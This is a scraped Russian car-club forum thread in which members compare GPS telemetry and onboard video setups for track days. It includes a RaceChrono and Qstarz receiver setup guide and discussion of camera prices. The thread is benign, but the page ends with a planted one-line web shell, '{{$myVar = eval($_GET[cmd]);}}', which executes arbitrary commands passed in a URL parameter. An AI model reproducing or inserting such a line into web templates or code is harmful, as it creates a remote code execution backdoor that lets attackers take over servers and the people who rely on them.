+ Ответить в теме
Страница 1 из 7 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 68

Тема: Что использовать для видео и хронометрии в заездах ?


  1. #1
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440

    Что использовать для видео и хронометрии в заездах ?

    Хорошо бы если народ в свои машинки онборд камеры установил, чтобы можно было потом анализировать результаты. Ну и новичкам это тоже поможет.

    Варианты:

    1. RaceLogic;
    2. G-Tech RR;
    3. Racechrono.

    Я остановил свой выбор на Рейсхроно, поэтому выкладываю более менее подробную инструкцию:

    Если у кого-то не хватает денег на рейслоджик, но очень хочется иметь нормальную телеметрию, то можно купить вот такой недорогой приборчик: Qstarz BT-Q818XT, стоит он порядка 2700 руб.
    Это высокочастотный gps приёмник, такой же как и в Рейслоджике, т.е. 10Hz (частота обновления 10 раз в секунду).

    Далее надо посредством usb шнурка, который идёт в комплекте, подсоединить эту коробочку к ноутбуку (можно и к коммуникатору, но у меня айфон, поэтому не прокатит). Качаем дрова с этого сайта http://www.qstarz.com/download.php

    Для обработки данных необходимо скачать программу racechrono с этого сайта для windows (в моём случае) http://www.racechrono.com/download/

    У меня были проблемы с поиском спутников, но она решилась после того как в "свойствах системы" => "оборудование" => "диспетчер устройств" принудительно выбрал у gps ресивира com port #2. Конечно он может быть занят, тогда выбираем другой, но желательно ближе к единице. Так же ставим значение скорости бит в секунду равным 115200.

    В самой программе racechrono в настройках так же выставляем 115200 и нужный компорт. Вот в общем то и всё.

    Да, надо будет разместить в папке мои документы/racechrono/tracks профиль трассы. Можно конечно самому вбить линию старт-финиша, сектора и т.п., но я уже скинул этот профиль для Мячково на сайт http://racechrono.com/tracks/?lang=en , правда пока они его не выложили... может и не выложат. Но вообще странно что там нет ни одного Российского трека, а какие-нибудь Боснийские или Африканские присутствуют.

    Так, для того чтобы сделать как у меня в онборде, надо будет скачать программу racechrono2avi.
    Дальше просто конвертируем в racechrono результаты сессии в формат CSV, открываем его в racechrono2avi и конвертируем в avi файл. Полученный avi-шный файл с помощью видеоредактора состыковываем и накладываем на онборд видео.

    Ну и собственно, вот само видео :)

    http://www.youtube.com/watch?v=yxKUlfj-aow&feature=plcp

    Если у кого-то есть программа
    google earth, то можно открыть этот файл и посмотреть траектории. К сожалению, есть небольшой сдвиг в координатах, но всё равно полезная штука )


    Траектории программа рисует очень точно. В общем телеметрией я доволен на 100%. Весьма бюджетная, очень удобная и в целом хорошая альтернатива рейслоджику, гтеку и т.п.
    И конечно же эта программа умеет засекать разгон до 100 км/ч, 140 км/ч, 200 км/ч, ну или 40-120 км/ч и т.п.

    При этом я советую с телеметрией работать в программе Circuit Tools.


    А здесь можно понять насколько точен приборчик:

    Мячково
    ==оф. телеметрия === ГПС приемник ==
    ==== 2.00.144 ======== 2.00.13Х ====
    ==== 2.13.541 ======== 2.13.52Х ====
    ==== 1.59.602 ======== 1.59.57Х ====
    ==== 2.00.210 ======== 2.00.19Х ====

    Смоленское кольцо (только я линию с/ф от балды поставил).
    ==== 1.51.067 ======== 1.51.05Х ====
    ==== 2.00.047 ======== 2.00.06Х ====
    ==== 1.51.289 ======== 1.51.29Х ====
    ==== 1.53.450 ======== 1.53.71Х ====
    Последний раз редактировалось VVZ; 13.06.2012 в 15:39.
    С уважением, Василий.

    My onboard video.

  2. #2
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674
    Цитата Сообщение от VVZ Посмотреть сообщение
    Хорошо бы если народ в свои машинки онборд камеры установил, чтобы можно было потом анализировать результаты. Ну и новичкам это тоже поможет.
    Я купил себе спецом на этот случай - поставлю. :)
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

  3. #3
    Цитата Сообщение от Гера Посмотреть сообщение
    Я купил себе спецом на этот случай - поставлю. :)
    -------- Гер ,а скока дненг стоит и где брал ?

  4. #4
    Супер Модератор Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Аватар для Spaceman
    Регистрация
    13.01.2009
    Откуда
    Moscow
    Машина
    GTI Overload
    Сообщений
    6,561
    Цитата Сообщение от Alexandr 922 Посмотреть сообщение
    -------- Гер ,а скока дненг стоит и где брал ?
    На ebay сейчас можно взять GoPro HD Motorsports Hero примерно за 8000р....
    Golf V GTI Overload почти сток...

  5. #5
    II место Лучший Пилот клуба 2011 deflep will become famous soon enough Аватар для deflep
    Регистрация
    27.08.2007
    Откуда
    Москва
    Машина
    VW Golf MkV, 2007, BUB*Rotrex, DSG
    Сообщений
    1,613
    Цитата Сообщение от Alexandr 922 Посмотреть сообщение
    -------- Гер ,а скока дненг стоит и где брал ?
    Саш, не бюджетно они все стоят. Меньше 5 тысяч вообще ничего нет. Что бы писал хотя бы в разрешении 720 стоимость поднимается до 10 тысяч.

    Я беру у брата взаймы фотик Сони (маленький как мыльница). Защищен от влаги, поэтому можно устанавливать и снаружи. Если у нас будет 2-3 камеры, то можно будет меняться между заездами.

    Добавлено через 1 минуту
    Цитата Сообщение от Spaceman Посмотреть сообщение
    На ebay сейчас можно взять GoPro HD Motorsports Hero примерно за 8000р....
    Если я правильно понимаю, то это будет предыдущая модель - не HD. C HD будет уже 10 и выше.
    Последний раз редактировалось deflep; 29.03.2011 в 12:26. Причина: Добавлено сообщение
    "Все что не умеет быстро ездить, обязательно должно красиво выглядеть"(с) я
    Wings for Life (c)
    A heart that hurts, Is a heart that... works.

  6. #6
    Цитата Сообщение от deflep Посмотреть сообщение
    Саш, не бюджетно они все стоят. Меньше 5 тысяч вообще ничего нет. Что бы писал хотя бы в разрешении 720 стоимость поднимается до 10 тысяч.

    Я беру у брата взаймы фотик Сони (маленький как мыльница). Защищен от влаги, поэтому можно устанавливать и снаружи. Если у нас будет 2-3 камеры, то можно будет меняться между заездами.
    ------------ Лех , тада можна купить для тех кто катаеться в гонках на всех , какое-то количество камер и пользоваться . Она ведь снимаеться и одеваеться без проблем на скока я понимаю . Раз они такие не дешевые.

  7. #7
    II место Лучший Пилот клуба 2011 deflep will become famous soon enough Аватар для deflep
    Регистрация
    27.08.2007
    Откуда
    Москва
    Машина
    VW Golf MkV, 2007, BUB*Rotrex, DSG
    Сообщений
    1,613
    Цитата Сообщение от VVZ Посмотреть сообщение
    Хорошо бы если народ в свои машинки онборд камеры установил, чтобы можно было потом анализировать результаты. Ну и новичкам это тоже поможет.
    Для анализа значительно лучше подойдет РейсЛоджик. Мне так кажется на примере ААГ - судя по видео Саша все время едет по траекториям, которые кажутся не правильными, и, самое главное, не соответствуют траекториям других лидеров заездов. Но при этом время у него всегда очень хорошее.
    "Все что не умеет быстро ездить, обязательно должно красиво выглядеть"(с) я
    Wings for Life (c)
    A heart that hurts, Is a heart that... works.

  8. #8
    надо подумать всем вместе и решить ченить

  9. #9
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440
    Цитата Сообщение от deflep Посмотреть сообщение
    Для анализа значительно лучше подойдет РейсЛоджик. Мне так кажется на примере ААГ - судя по видео Саша все время едет по траекториям, которые кажутся не правильными, и, самое главное, не соответствуют траекториям других лидеров заездов. Но при этом время у него всегда очень хорошее.
    РейсЛоджик это конечно лучший вариант, не спорю. Правда я пока не готов себе прикупить это чудо-устройство. Так же не уверен, что многие будут готовы его купить.
    А камера/фотик или даже смартфон, которые могут снять видео, есть у каждого )

    Что касается Саши... не понимаю как он так едет )
    С уважением, Василий.

    My onboard video.

  10. #10
    Супер Модератор Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Аватар для Spaceman
    Регистрация
    13.01.2009
    Откуда
    Moscow
    Машина
    GTI Overload
    Сообщений
    6,561
    Цитата Сообщение от deflep Посмотреть сообщение
    Если я правильно понимаю, то это будет предыдущая модель - не HD. C HD будет уже 10 и выше.
    Нет, ты не правильно понимаешь ) Это как раз FullHD будет
    на днях должны привезти )
    Golf V GTI Overload почти сток...

+ Ответить в теме
Страница 1 из 7 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. Какие свечи зажигания использовать на ст.2 Рево (Октавия 2 FL, 1.8 TSI)?
    от Verlion в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 7
    Последнее сообщение: 02.10.2023, 15:40
  2. Ответов: 1
    Последнее сообщение: 24.12.2020, 01:49
  3. видео гти )))
    от Консильери в разделе Курилка
    Ответов: 9
    Последнее сообщение: 10.06.2011, 15:13
  4. Афигенное Видео
    от RABBIT в разделе Курилка
    Ответов: 8
    Последнее сообщение: 16.02.2009, 23:07
  5. видео и фотки
    от RABBIT в разделе Клубная Тема
    Ответов: 11
    Последнее сообщение: 04.04.2006, 13:45

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}